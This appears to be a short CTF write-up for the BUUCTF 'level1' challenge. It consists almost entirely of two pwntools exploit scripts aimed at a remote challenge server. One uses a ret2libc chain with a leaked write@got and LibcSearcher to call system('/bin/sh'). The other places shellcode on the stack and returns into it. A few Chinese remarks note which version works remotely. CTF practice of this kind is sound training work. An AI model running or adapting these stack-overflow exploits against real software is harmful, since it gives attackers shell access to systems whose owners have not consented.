from pwn import *from LibcSearcher import LibcSearchercontext.log_level = "debug"# io = process("./level1")io = remote("node4.buuoj.cn",29196)elf = ELF("./level1")offset = 0x88vuln_addr = elf.symbols["vulnerable_function"]write_plt = elf.plt["write"]write_got = elf.got["write"]# 0x0804847Bpayload = b"A" * (offset + 4) + p32(write_plt) + p32(vuln_addr) + p32(0) + p32(write_got) + p32(4)io.sendline(payload)write_addr = u32(io.recv())print("recv --- >",hex(write_addr))libc = LibcSearcher("write",write_addr)libcbase = write_addr - libc.dump("write")system_addr = libcbase + libc.dump("system")bin_sh = libcbase + libc.dump("str_bin_sh")payload = b"A" * (offset + 4) + p32(system_addr) + p32(0x1) + p32(bin_sh)io.sendline(payload)io.interactive()
打远程的
shellcode写栈上的估计远程打不通
from pwn import*context(arch='i386',os='linux',log_level='debug')io = remote("node4.buuoj.cn",29172)#io = process('./level1')sleep(0.1)shellcode = asm(shellcraft.sh())buf = io.recvline()buf_addr = buf[14:22]buf_addr = int(buf_addr,16)log.success(hex(buf_addr))#shellcode = asm(shellcraft.sh())shellcode = shellcode.ljust(0x8c,b'a')shellcode+=p32(buf_addr)io.sendline(shellcode)io.interactive()
这个本地打的通,远程不行,
若有收获,就点个赞吧
0 人点赞
